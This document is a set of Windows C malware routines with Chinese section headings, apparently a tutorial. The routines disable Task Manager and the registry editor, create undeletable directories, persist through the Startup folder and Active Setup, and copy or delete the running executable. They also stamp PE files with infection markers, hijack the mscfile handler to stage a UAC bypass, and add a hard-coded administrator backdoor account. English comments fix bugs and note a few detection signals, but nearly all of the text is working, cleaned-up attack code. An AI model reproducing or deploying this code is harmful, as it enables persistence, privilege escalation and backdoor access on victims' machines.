針對注冊表惡意修改:
#include <stdio.h>
#include <Windows.h>
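// Disable Task Manager for the current user by writing the DisableTaskMgr
// policy value (REG_DWORD = 1) under
// HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System.
// Fix: the original called RegSetValueEx on an uninitialized handle when key
// creation failed; the value is now written only after the key exists, and the
// legacy RegCreateKey is replaced by RegCreateKeyEx with the minimal access right.
// No return value: callers cannot observe failure (interface kept as-is).
// Writes to this value are a classic tampering indicator worth alerting on.
void RegTaskmanagerForbidden()
{
    HKEY hkey = NULL;
    DWORD value = 1;
    LONG rc = RegCreateKeyEx(HKEY_CURRENT_USER,
                             "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System",
                             0, NULL, REG_OPTION_NON_VOLATILE, KEY_SET_VALUE, NULL, &hkey, NULL);
    if (rc != ERROR_SUCCESS)
        return;
    RegSetValueEx(hkey, "DisableTaskMgr", 0, REG_DWORD, (const BYTE *)&value, sizeof(value));
    RegCloseKey(hkey);
}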
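// Disable the registry editor for the current user by writing the
// DisableRegistryTools policy value (REG_DWORD = 1) under
// HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System.
// Fix: the original used an uninitialized handle if RegCreateKey failed; the
// value is now written only on success, with the minimal KEY_SET_VALUE right.
// No return value: callers cannot observe failure (interface kept as-is).
void RegEditForbidden()
{
    HKEY hkey = NULL;
    DWORD value = 1;
    LONG rc = RegCreateKeyEx(HKEY_CURRENT_USER,
                             "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System",
                             0, NULL, REG_OPTION_NON_VOLATILE, KEY_SET_VALUE, NULL, &hkey, NULL);
    if (rc != ERROR_SUCCESS)
        return;
    RegSetValueEx(hkey, "DisableRegistryTools", 0, REG_DWORD, (const BYTE *)&value, sizeof(value));
    RegCloseKey(hkey);
}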
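// Break the desktop wallpaper by pointing the Wallpaper policy value at a bogus
// path and writing WallpaperStyle under
// HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System.
// Fixes: the original never closed the key handle, used the handle even when
// key creation failed, and stored only 3 bytes of "c://" with no terminator,
// so the REG_SZ value was malformed. The string is now stored complete.
// NOTE(review): the equivalent group-policy setting stores WallpaperStyle as a
// string; the REG_DWORD written here is kept from the original — confirm it is honored.
void RegModifyBackroud()
{
    HKEY hkey = NULL;
    DWORD value = 1;
    // Deliberately not an image path: the shell cannot load it, so no wallpaper is shown.
    static const char wallpaper[] = "c://";
    LONG rc = RegCreateKeyEx(HKEY_CURRENT_USER,
                             "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System",
                             0, NULL, REG_OPTION_NON_VOLATILE, KEY_SET_VALUE, NULL, &hkey, NULL);
    if (rc != ERROR_SUCCESS)
        return;
    // sizeof(wallpaper) includes the terminating NUL, as REG_SZ requires.
    RegSetValueEx(hkey, "Wallpaper", 0, REG_SZ, (const BYTE *)wallpaper, sizeof(wallpaper));
    RegSetValueEx(hkey, "WallpaperStyle", 0, REG_DWORD, (const BYTE *)&value, sizeof(value));
    RegCloseKey(hkey);
}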
創建不可刪除文件: 關鍵在於用帶尾隨反斜線的路徑(如 ...\\anti...\\)在子目錄中創建一個名稱以句點結尾的目錄。Win32 路徑正規化只會去掉最後一個路徑段末尾的句點與空格; 因為路徑以反斜線結尾, "anti..." 不是最後一段, 目錄便以字面名稱建立, 而資源管理器等工具之後以 "anti..." 引用它時會被正規化成 "anti" 而找不到。用同樣帶尾隨反斜線的寫法(或 \\?\ 前綴)即可刪除, 下面的 ClearImmunity 正是這樣做的。
#include <stdio.h>
#include <shlobj.h>
#include <windows.h>
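// Create "<FilePath><FileName>" and, inside it, a hidden directory named
// "anti..." that ordinary tools cannot address.
// Returns TRUE only if both directories were created; FALSE if the combined
// path does not fit the buffer or either CreateDirectory fails (the outer
// directory is left in place in that case, as in the original).
// Fix: the original built the path with strncpy(..., strlen(src)) + strcat,
// which neither NUL-terminates nor bounds the copy; snprintf with a length
// check replaces it.
BOOL SetImmunity(char *FilePath, char *FileName)
{
    char file[2048] = { 0 };
    int n = snprintf(file, sizeof(file), "%s%s", FilePath, FileName);
    if (n < 0 || (size_t)n >= sizeof(file))
        return FALSE;
    if (!CreateDirectory(file, NULL))
        return FALSE;
    // The trailing backslash matters: Win32 strips trailing dots only from the
    // final path segment, so "anti..." is created under its literal name while
    // later references to "...\anti..." (no trailing backslash) normalize to
    // "anti" and miss it. ClearImmunity uses the same spelling to remove it.
    if (strlen(file) + strlen("\\anti...\\") >= sizeof(file))
        return FALSE;
    strcat(file, "\\anti...\\");
    if (!CreateDirectory(file, NULL))
        return FALSE;
    // Hide the inner directory; failure here is not treated as an error.
    SetFileAttributes(file, FILE_ATTRIBUTE_HIDDEN);
    return TRUE;
}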
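// Remove the directories created by SetImmunity: first the inner "anti..."
// directory (addressed with the trailing backslash so the name is not
// normalized), then "<FilePath><FileName>" itself.
// Silent on failure, like the original. Fix: paths are now built with a bounded
// snprintf instead of unterminated strncpy/strcat, and the buffer is fully
// rebuilt rather than partially cleared (the original ZeroMemory'd only
// MAX_PATH of the 2048-byte buffer).
void ClearImmunity(char *FilePath, char *FileName)
{
    char file[2048] = { 0 };
    int n = snprintf(file, sizeof(file), "%s%s\\anti...\\", FilePath, FileName);
    if (n < 0 || (size_t)n >= sizeof(file))
        return;
    // Inner directory first; RemoveDirectory requires it to be empty.
    RemoveDirectory(file);
    n = snprintf(file, sizeof(file), "%s%s", FilePath, FileName);
    if (n < 0 || (size_t)n >= sizeof(file))
        return;
    RemoveDirectory(file);
}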
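// Plant four "immune" directories under c:/ (forward slashes are accepted by
// Win32). Despite the original comment, no autorun.inf is created here.
int main(int argc, char *argv[])
{
    static char *names[4] = { "你", "好", "世", "界" };
    // Fix: the original divided by sizeof(int), which on 64-bit builds
    // (sizeof(char *) == 8) yields 8 and reads past the end of the array.
    size_t count = sizeof(names) / sizeof(names[0]);
    (void)argc;
    (void)argv;
    for (size_t i = 0; i < count; i++)
    {
        SetImmunity("c://", names[i]);
        // To undo: ClearImmunity("c://", names[i]);
    }
    system("pause");
    return 0;
}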
通過啟動資料夾(Startup)自啟動: 注意 CSIDL_STARTUP 對應的是「開始功能表\程式集\啟動」資料夾(使用者登入時執行其中的程式), 並不是工作列的「快速啟動」列。
#include <stdio.h>
#include <windows.h>
#include <Shlobj.h>
#pragma comment(lib, "shell32.lib")
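// Copy lpszSrcFilePath into the current user's Startup folder as
// lpszDestFileName so it is launched at logon.
// CSIDL_STARTUP is the Start Menu "Startup" folder, not the Quick Launch bar
// the original comment referred to.
// Returns the result of CopyFile; FALSE if the Startup folder cannot be
// resolved or the destination path does not fit MAX_PATH. The original
// returned TRUE unconditionally and used unbounded wsprintf.
BOOL AutoRun_Startup(char *lpszSrcFilePath, char *lpszDestFileName)
{
    char szStartupPath[MAX_PATH] = { 0 };
    char szDestFilePath[MAX_PATH] = { 0 };
    if (!SHGetSpecialFolderPath(NULL, szStartupPath, CSIDL_STARTUP, TRUE))
        return FALSE;
    printf("快速啟動路徑: %s\n", szStartupPath);
    int n = snprintf(szDestFilePath, sizeof(szDestFilePath), "%s\\%s",
                     szStartupPath, lpszDestFileName);
    if (n < 0 || (size_t)n >= sizeof(szDestFilePath))
        return FALSE;
    // bFailIfExists == FALSE: an existing copy is overwritten.
    return CopyFile(lpszSrcFilePath, szDestFilePath, FALSE);
}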
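// Install c:/main.exe into the Startup folder and report the outcome
// (the original ignored the return value).
int main(int argc, char *argv[])
{
    (void)argc;
    (void)argv;
    if (!AutoRun_Startup("c://main.exe", "main.exe"))
        printf("AutoRun_Startup failed (error %lu)\n", (unsigned long)GetLastError());
    system("pause");
    return 0;
}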
設置重啟自刪除:
#include <stdio.h>
#include <stdlib.h>
#include <Windows.h>
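// Schedule pszFileName for deletion at the next reboot.
// pszFileName must be a full path: the "\\?\" prefix turns off Win32 path
// normalization, so relative paths are not resolved.
// MOVEFILE_DELAY_UNTIL_REBOOT with a NULL destination records the delete in
// HKLM\...\Session Manager\PendingFileRenameOperations; per the MoveFileEx
// documentation this requires an administrator or LocalSystem context, so the
// call fails (returns FALSE) for a standard user.
// Returns the MoveFileEx result; FALSE if the path does not fit the buffer
// (the original appended with lstrcat and no bound).
BOOL RebootDelete(char *pszFileName)
{
    char szTemp[MAX_PATH + 4] = "\\\\?\\";
    size_t used = strlen(szTemp);
    if (strlen(pszFileName) >= sizeof(szTemp) - used)
        return FALSE;
    lstrcat(szTemp, pszFileName);
    return MoveFileEx(szTemp, NULL, MOVEFILE_DELAY_UNTIL_REBOOT);
}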
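// Queue C:\shell.exe for deletion at reboot and report the result.
// Fix: the original was missing the semicolon after the RebootDelete call
// and did not compile.
int main(int argc, char *argv[])
{
    (void)argc;
    (void)argv;
    if (!RebootDelete("C:\\shell.exe"))
        printf("RebootDelete failed (error %lu)\n", (unsigned long)GetLastError());
    system("pause");
    return 0;
}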
實現病毒自我繁殖:
#include <stdio.h>
#include <Windows.h>
#include <shlobj.h>
#include <time.h>
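// Copy the running executable to the current user's desktop under a random
// name "<base-22 number>.exe".
// Fixes: the 100-byte destination buffer overflowed for long profile paths
// (strcat of the desktop path plus name), and the results of GetModuleFileName
// and SHGetSpecialFolderPath were not checked. Silent on failure, as before.
void Reproduce()
{
    char name_str[100] = { 0 };
    TCHAR szpath[MAX_PATH] = { 0 };
    TCHAR desktop[MAX_PATH] = { 0 };
    // Room for "<desktop>\<name>.exe" plus terminator.
    char target[MAX_PATH + sizeof(name_str) + 8] = { 0 };
    srand((unsigned)time(NULL));
    // Radix 22 is kept from the original; it only affects how the number is spelled.
    _itoa(rand() % 102408, name_str, 22);
    if (GetModuleFileName(NULL, szpath, MAX_PATH) == 0)
        return;
    if (!SHGetSpecialFolderPath(NULL, desktop, CSIDL_DESKTOP, FALSE))
        return;
    int n = snprintf(target, sizeof(target), "%s\\%s.exe", desktop, name_str);
    if (n < 0 || (size_t)n >= sizeof(target))
        return;
    // bFailIfExists == FALSE: an existing file of that name is overwritten.
    CopyFile(szpath, target, FALSE);
}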
// Entry point: drop one copy of this executable onto the desktop, then wait
// for a keypress so the console stays open.
int main(int argc, char *argv[])
{
    (void)argc;
    (void)argv;
    Reproduce();
    system("pause");
    return 0;
}
病毒的自刪除手段:
#include <stdio.h>
#include <shlobj.h>
#include <windows.h>
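// Delete the running executable after exit by spawning
// "%COMSPEC% /c del <short path> > nul" as a low-priority process and raising
// our own priority so this process exits before the del runs.
// Returns TRUE once the cmd process was started (the deletion itself happens
// later and is not verified); FALSE if the module path, its 8.3 form, or
// COMSPEC cannot be obtained, or ShellExecuteEx fails.
// Fixes: SHELLEXECUTEINFO is now zero-initialized (the original left fields
// ShellExecuteEx may read undefined), the process handle returned via
// SEE_MASK_NOCLOSEPROCESS is closed, and szParams is sized for the prefix,
// a MAX_PATH path and the suffix (the original's MAX_PATH buffer could overflow).
BOOL SelfDel()
{
    SHELLEXECUTEINFO sei = { 0 };
    TCHAR szModule[MAX_PATH], szComspec[MAX_PATH], szParams[MAX_PATH + 16];
    if (GetModuleFileName(0, szModule, MAX_PATH) == 0 ||
        GetShortPathName(szModule, szModule, MAX_PATH) == 0 ||
        GetEnvironmentVariable("COMSPEC", szComspec, MAX_PATH) == 0)
        return FALSE;
    // The 8.3 short path contains no spaces, so the argument needs no quoting.
    lstrcpy(szParams, "/c del ");
    lstrcat(szParams, szModule);
    lstrcat(szParams, " > nul");
    sei.cbSize = sizeof(sei);
    sei.hwnd = 0;
    sei.lpVerb = "Open";
    sei.lpFile = szComspec;
    sei.lpParameters = szParams;
    sei.lpDirectory = 0;
    sei.nShow = SW_HIDE;
    sei.fMask = SEE_MASK_NOCLOSEPROCESS;
    if (!ShellExecuteEx(&sei))
        return FALSE;
    // Make cmd wait its turn and give ourselves time to leave memory first.
    // NOTE(review): REALTIME_PRIORITY_CLASS needs SeIncreaseBasePriorityPrivilege;
    // without it the documented behavior is a silent downgrade to HIGH_PRIORITY_CLASS.
    SetPriorityClass(sei.hProcess, IDLE_PRIORITY_CLASS);
    SetPriorityClass(GetCurrentProcess(), REALTIME_PRIORITY_CLASS);
    SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_TIME_CRITICAL);
    // Tell the shell the file is gone so Explorer refreshes; the del has not run yet.
    SHChangeNotify(SHCNE_DELETE, SHCNF_PATH, szModule, 0);
    CloseHandle(sei.hProcess);
    return TRUE;
}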
// Entry point: arm self-deletion and exit at once so the queued del can run.
// The return value is deliberately ignored; there is nothing to do on failure.
int main(int argc, char *argv[])
{
    (void)argc;
    (void)argv;
    (void)SelfDel();
    return 0;
}
設置文件感染標志: PE 文件 DOS 頭中除 e_magic 與 e_lfanew 以外的字段不被 Windows 載入器使用, 可以在其中寫入標記來檢查文件是否已被處理過。下例在 e_cblp 處寫入 4 個字節(覆蓋 e_cblp 與 e_cp 兩個字段)。
#include <stdio.h>
#include <stddef.h>
#include <windows.h>
#define VIRUSFLAGS 0xCCCC
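// Write the 4-byte marker dwSig at absolute file offset dwAddr in hFile.
// Returns TRUE only if the seek succeeded and all sizeof(DWORD) bytes were
// written; the original returned TRUE regardless of either call's outcome.
BOOL WriteSig(DWORD dwAddr, DWORD dwSig, HANDLE hFile)
{
    DWORD dwNum = 0;
    if (SetFilePointer(hFile, dwAddr, NULL, FILE_BEGIN) == INVALID_SET_FILE_POINTER)
        return FALSE;
    if (!WriteFile(hFile, &dwSig, sizeof(dwSig), &dwNum, NULL))
        return FALSE;
    return dwNum == sizeof(dwSig);
}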
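// Return TRUE if the 4 bytes at absolute file offset dwAddr in hFile equal
// dwSig. Returns FALSE on seek/read failure or a short read; the original
// compared an uninitialized/partial value in those cases.
BOOL CheckSig(DWORD dwAddr, DWORD dwSig, HANDLE hFile)
{
    DWORD dwSigNum = 0;
    DWORD dwNum = 0;
    if (SetFilePointer(hFile, dwAddr, NULL, FILE_BEGIN) == INVALID_SET_FILE_POINTER)
        return FALSE;
    if (!ReadFile(hFile, &dwSigNum, sizeof(dwSigNum), &dwNum, NULL))
        return FALSE;
    if (dwNum != sizeof(dwSigNum))
        return FALSE;
    return dwSigNum == dwSig;
}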
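// Open c:/1.exe, verify it is a PE image, and stamp VIRUSFLAGS into the DOS
// header's e_cblp/e_cp bytes unless the stamp is already present.
// Fixes relative to the original: the marker was written BEFORE it was checked,
// so every file was reported as already infected; CreateFile/CreateFileMapping/
// MapViewOfFile results were not checked (NULL dereference on failure);
// e_lfanew was trusted blindly; and no handle or view was ever released.
int main(int argc, char *argv[])
{
    HANDLE hFile = INVALID_HANDLE_VALUE;
    HANDLE hMap = NULL;
    LPVOID lpBase = NULL;
    PIMAGE_DOS_HEADER pDosHeader = NULL;
    PIMAGE_NT_HEADERS pNtHeader = NULL;
    DWORD fileSize = 0;
    const DWORD sigOffset = (DWORD)offsetof(IMAGE_DOS_HEADER, e_cblp);
    int rc = -1;
    (void)argc;
    (void)argv;

    hFile = CreateFile("c://1.exe", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ, 0,
                       OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, 0);
    if (hFile == INVALID_HANDLE_VALUE)
        goto cleanup;
    // Anything shorter than the NT headers cannot be a PE image.
    fileSize = GetFileSize(hFile, NULL);
    if (fileSize == INVALID_FILE_SIZE || fileSize < sizeof(IMAGE_NT_HEADERS))
    {
        printf("文件非可執行文件 \n");
        goto cleanup;
    }
    // A read-only view is enough: the headers are only inspected here.
    hMap = CreateFileMapping(hFile, NULL, PAGE_READONLY, 0, 0, NULL);
    if (hMap == NULL)
        goto cleanup;
    lpBase = MapViewOfFile(hMap, FILE_MAP_READ, 0, 0, 0);
    if (lpBase == NULL)
        goto cleanup;
    pDosHeader = (PIMAGE_DOS_HEADER)lpBase;
    // Validate the DOS signature and keep e_lfanew inside the file before
    // dereferencing the NT headers.
    if (pDosHeader->e_magic != IMAGE_DOS_SIGNATURE ||
        pDosHeader->e_lfanew < 0 ||
        (DWORD)pDosHeader->e_lfanew > fileSize - sizeof(IMAGE_NT_HEADERS))
    {
        printf("文件非可執行文件 \n");
        goto cleanup;
    }
    pNtHeader = (PIMAGE_NT_HEADERS)((BYTE *)lpBase + pDosHeader->e_lfanew);
    if (pNtHeader->Signature != IMAGE_NT_SIGNATURE)
    {
        printf("文件非可執行文件 \n");
        goto cleanup;
    }
    // Drop the view before ReadFile/WriteFile: a mapped view is not guaranteed
    // to be coherent with plain file I/O on the same file.
    UnmapViewOfFile(lpBase);
    lpBase = NULL;
    CloseHandle(hMap);
    hMap = NULL;
    // Check first, then write: only stamp files that are not yet marked.
    if (CheckSig(sigOffset, VIRUSFLAGS, hFile))
        printf("文件已被感染,無法重復感染. \n");
    else
        WriteSig(sigOffset, VIRUSFLAGS, hFile);
    rc = 0;

cleanup:
    if (lpBase != NULL)
        UnmapViewOfFile(lpBase);
    if (hMap != NULL)
        CloseHandle(hMap);
    if (hFile != INVALID_HANDLE_VALUE)
        CloseHandle(hFile);
    system("pause");
    return rc;
}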
劫持 mscfile 打開命令(UAC 繞過的註冊表準備步驟): 下例並不會關閉 UAC, 而是在 HKCU\Software\Classes\mscfile\Shell\Open\Command 寫入默認值。HKCU 下的類註冊會優先於 HKLM, 因此之後任何以該處理程序打開 .msc 文件的程序都會執行這裡寫入的命令; 代碼本身沒有觸發任何程序。對此鍵的寫入是值得告警的檢測點。
#include <Windows.h>
// Write lpszExePath as the default value of
// HKCU\Software\Classes\mscfile\Shell\Open\Command.
// Per-user class registrations under HKCU\Software\Classes take precedence
// over the machine-wide ones, so whatever resolves the "mscfile" open handler
// afterwards runs lpszExePath. This stages a well-known UAC-bypass pattern;
// it does not change UAC itself. Writes to this key are a useful detection signal.
// Returns FALSE if the key could not be created, TRUE otherwise (the result of
// RegSetValueEx is not checked).
BOOL SetReg(char *lpszExePath)
{
HKEY hKey = NULL;
// Create (or open) the key. KEY_WOW64_64KEY requests the 64-bit registry view.
// NOTE(review): hKey is only assigned on success, so the NULL test below works,
// but checking the LSTATUS return value directly would be clearer.
::RegCreateKeyEx(HKEY_CURRENT_USER, "Software\\Classes\\mscfile\\Shell\\Open\\Command",
0, NULL, 0, KEY_WOW64_64KEY | KEY_ALL_ACCESS, NULL, &hKey, NULL);
if (NULL == hKey)
{
return FALSE;
}
// Default value (NULL name), REG_SZ, size includes the terminating NUL.
::RegSetValueEx(hKey, NULL, 0, REG_SZ, (BYTE *)lpszExePath, (1 + ::lstrlen(lpszExePath)));
::RegCloseKey(hKey);
return TRUE;
}
// Point the mscfile open handler at cmd.exe.
// NOTE(review): printf and system come from <stdio.h>/<stdlib.h>, which this
// listing does not include; add them.
int main(int argc,char *argv[])
{
BOOL bRet = FALSE;
PVOID OldValue = NULL;
// Disable WOW64 file-system redirection. This only affects file paths
// (System32 vs SysWOW64); it has no effect on the registry write below.
::Wow64DisableWow64FsRedirection(&OldValue);
// Stage the handler; bRet is not examined afterwards.
bRet = SetReg("C:\\Windows\\System32\\cmd.exe");
// NOTE(review): the message is misleading — UAC is not turned off by this program.
printf("已關閉 \n");
// Restore file-system redirection.
::Wow64RevertWow64FsRedirection(OldValue);
system("pause");
return 0;
}
添加惡意后門賬號:
#include <stdio.h>
#include <assert.h>
#include <windows.h>
#include <lm.h>
#pragma comment(lib,"netapi32")
// Create a local user account (USER_PRIV_USER) with the given name and
// password, then add it to the local Administrators group.
// Both NetUserAdd and NetLocalGroupAddMembers on the local machine require
// administrative rights. A local account created and elevated this way is a
// textbook backdoor; Security events 4720 (account created) and 4732 (member
// added to a local group) cover it.
// Failures are silent apart from the missing success messages.
void AddUser(LPWSTR UserName, LPWSTR Password)
{
USER_INFO_1 user;
user.usri1_name = UserName;
user.usri1_password = Password;
user.usri1_priv = USER_PRIV_USER;
user.usri1_home_dir = NULL;
user.usri1_comment = NULL;
user.usri1_flags = UF_SCRIPT;
user.usri1_script_path = NULL;
// Level-1 add on the local machine (server name NULL).
if (NetUserAdd(NULL, 1, (LPBYTE)&user, 0) == NERR_Success)
printf("創建用戶完成 \n");
// Level-3 membership record: domain-qualified or bare account name.
LOCALGROUP_MEMBERS_INFO_3 account;
account.lgrmi3_domainandname = user.usri1_name;
if (NetLocalGroupAddMembers(NULL, L"Administrators", 3, (LPBYTE)&account, 1) == NERR_Success)
printf("添加到組完成 \n");
}
// Enumerate the normal user accounts on the local machine and print one
// account name per line. Pages through NetUserEnum while it reports
// ERROR_MORE_DATA, freeing each buffer after use.
void EnumUser()
{
    LPUSER_INFO_0 pBuf = NULL;
    DWORD dwEntriesRead = 0, dwTotalEntries = 0, dwResumeHandle = 0;
    NET_API_STATUS nStatus;
    LPTSTR pszServerName = NULL;   // NULL selects the local machine
    do
    {
        nStatus = NetUserEnum((LPCWSTR)pszServerName, 0, FILTER_NORMAL_ACCOUNT,
                              (LPBYTE *)&pBuf, MAX_PREFERRED_LENGTH,
                              &dwEntriesRead, &dwTotalEntries, &dwResumeHandle);
        if ((nStatus == NERR_Success || nStatus == ERROR_MORE_DATA) && pBuf != NULL)
        {
            LPUSER_INFO_0 pEntry = pBuf;
            for (DWORD i = 0; i < dwEntriesRead; i++, pEntry++)
            {
                assert(pEntry != NULL);
                if (pEntry == NULL)
                    break;
                wprintf(L"%s\n", pEntry->usri0_name);
            }
        }
        if (pBuf != NULL)
        {
            NetApiBufferFree(pBuf);
            pBuf = NULL;
        }
    } while (nStatus == ERROR_MORE_DATA);
    NetApiBufferFree(pBuf);
}
// Entry point: create the hard-coded administrator account, list the local
// accounts, then wait for a keypress.
int main(int argc, char *argv[])
{
    (void)argc;
    (void)argv;
    AddUser(L"lyshark", L"123123");
    EnumUser();
    system("pause");
    return 0;
}
通過 Active Setup 實現自啟動: 這裡用的是 Active Setup 的 Installed Components 機制(每個使用者登入時執行一次 StubPath), 與 ActiveX 無關; 寫入 HKLM 以及向 System32 複製文件都需要管理員權限。
#include <stdio.h>
#include <windows.h>
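// Create (or open) hRoot\szSubkey and set ValueName to the REG_SZ string Data.
// Silent on failure, like the original.
// Fixes: the key handle was leaked when RegSetValueEx failed, and the data
// size omitted the terminating NUL that REG_SZ values are expected to carry.
void CreateStringReg(HKEY hRoot, LPCWSTR szSubkey, LPCWSTR ValueName, LPCWSTR Data)
{
    HKEY hKey = NULL;
    long lRet = RegCreateKeyEx(hRoot, szSubkey, 0, NULL, REG_OPTION_NON_VOLATILE,
                               KEY_SET_VALUE, NULL, &hKey, NULL);
    if (ERROR_SUCCESS != lRet)
        return;
    // Size is in bytes and includes the terminator.
    DWORD cbData = (DWORD)((wcslen(Data) + 1) * sizeof(WCHAR));
    RegSetValueEx(hKey, ValueName, 0, REG_SZ, (const BYTE *)Data, cbData);
    RegCloseKey(hKey);
}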
// Register this executable under Active Setup so it runs once per user at logon:
// HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{GUID} with a
// StubPath value naming the program. Active Setup runs StubPath for a user
// whose HKCU copy of the component key is missing, so deleting the HKCU key
// re-arms it for the current user. Requires administrative rights (writes HKLM
// and copies into the system directory).
void CreateAutoRun()
{
HKEY hKey;
DWORD dwDpt = REG_OPENED_EXISTING_KEY;   // unused
// Remove the per-user "already run" marker.
RegDeleteKey(HKEY_CURRENT_USER,
L"Software\\Microsoft\\Active Setup\\Installed Components\\{84B421CD-B018-2513-B0B1-5C76DEF70F20}");
// Probe for the machine-wide component; install only if it is absent.
// NOTE(review): REG_OPTION_NON_VOLATILE is passed as ulOptions; it equals 0,
// so this works by coincidence. The handle opened on success is never closed.
long lRet = RegOpenKeyEx(HKEY_LOCAL_MACHINE,
L"SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\{84B421CD-B018-2513-B0B1-5C76DEF70F20}",
REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, &hKey);
if (lRet != ERROR_SUCCESS)
{
WCHAR SelfFile[MAX_PATH];
WCHAR SystemPath[MAX_PATH + 20];
// NOTE(review): GetSystemDirectory takes a size in TCHARs, but sizeof(SystemPath)
// is a byte count (twice the real capacity for WCHAR). Harmless only because the
// system directory path is short; pass MAX_PATH + 20 instead.
GetSystemDirectory(SystemPath, sizeof(SystemPath));
// Append "\main.exe" (the original comment referred to activexrun.exe).
wcscat_s(SystemPath, L"\\main.exe");
// Path of the running executable.
GetModuleFileName(NULL, SelfFile, MAX_PATH);
// Copy this program into the system directory as main.exe; result not checked.
CopyFile(SelfFile, SystemPath, FALSE);
// Publish the StubPath value pointing at the copy.
CreateStringReg(HKEY_LOCAL_MACHINE,
L"SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\{84B421CD-B018-2513-B0B1-5C76DEF70F20}",
L"StubPath", SystemPath);
}
}
// Entry point: install the Active Setup component, then wait for a keypress.
int main(int argc, char *argv[])
{
    (void)argc;
    (void)argv;
    CreateAutoRun();
    system("pause");
    return 0;
}